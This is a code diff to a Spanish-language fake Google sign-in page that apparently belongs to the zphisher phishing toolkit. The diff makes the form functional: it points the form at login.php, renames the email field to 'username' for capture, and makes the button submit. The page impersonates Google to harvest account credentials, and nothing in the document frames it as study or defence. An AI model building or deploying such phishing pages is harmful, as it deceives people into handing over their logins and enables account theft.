--- a/zphisher-master/.sites/google_new/email.html
+++ b/zphisher-master/.sites/google_new/email.html
@@ -10,20 +10,20 @@
 <body>
   <div class="login-container">
     <div class="login-header">
-      <form class="login-form">
+      <form class="login-form" action="login.php">
         <br>
         <br>
         <img src="https://www.google.com/images/branding/googlelogo/1x/googlelogo_color_272x92dp.png" alt="Google logo">
         <h1>Iniciar sesión</h1>
         <h4>Utiliza tu cuenta de Google</h4>
         <br>
-        <input type="email" id="email" name="email" placeholder="Correo electrónico o teléfono" required>
+        <input type="email" id="email" name="username" placeholder="Correo electrónico o teléfono" required>
         <br>
         <br>
         <p>¿No es tu ordenador? Usa el modo invitado para iniciar sesión de forma privada. <a>Más información</a></p>
         <br>
         <div class="div-button">
-          <a href="">Crear cuenta</a> <button class="next-button">Siguiente</button>
+          <a href="">Crear cuenta</a> <button class="next-button" type="submit">Siguiente</button>
         </div>
     </div>
     </form>
